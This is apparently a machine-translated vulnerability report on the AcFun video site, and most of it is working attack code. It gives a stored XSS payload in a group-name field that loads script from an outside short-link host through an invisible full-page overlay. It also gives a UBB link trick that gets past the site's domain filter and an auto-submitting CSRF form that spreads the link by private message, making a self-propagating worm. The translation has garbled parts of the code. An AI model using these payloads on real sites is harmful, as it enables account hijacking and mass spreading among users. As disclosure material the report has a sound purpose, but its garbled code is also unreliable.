User center friend group location:
X "x =" x
There is a length check on the page, but it doesn't matter. packet capture structure:
Name = addGroup & groupName = x "onmouseover =" var h = document. getElementsByTagName ('head') [0]; var s = document. createElement ('script'); s. src = 'HTTP: // 126.am/ 70Qdp3 '; h. appendChild (s); "id =" xss "style =" position: absolute; top: 0px; left: 0px; z-index: 999; padding: 1000px; filter: alpha (opacity = 0);-moz-opacity: 0; opacity: 0 ;"
Effect:
Js content:
Alert ('xss script ');
$ ("# Xss"). remove ();
The following uses self-propagation:
The private message function in the user center can send links. The links are filtered and can only be linked to the acfun. TV Domain Name:
However, UBB can be constructed to bypass:
[Url = http://www.acfun. TV @ 126.am/ n6ccT0] http://www.acfun. TV /v/ac634542#/url]
Simultaneously http://www.acfun. TV /api/mail.aspx? Name = newMail location no source verification:
<Html>
<Body>
<Form id = "csrf" name = "csrf" action = "http://www.acfun. TV /api/mail.aspx? Name = newMail "method =" POST ">
<Input type = "hidden" name = "userId" value = "<? Php echo rand (,);?> "/>
<Input type = "hidden" name = "content" value = "[url = http://www.acfun. TV @ 126.am/ n6ccT0] http://www.acfun. TV /v/ac634542#/url]"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. csrf. submit ();
</Script>
</Body>
</Html>
One-stop hijacking of notifications ...:
Solution:
You know me better ..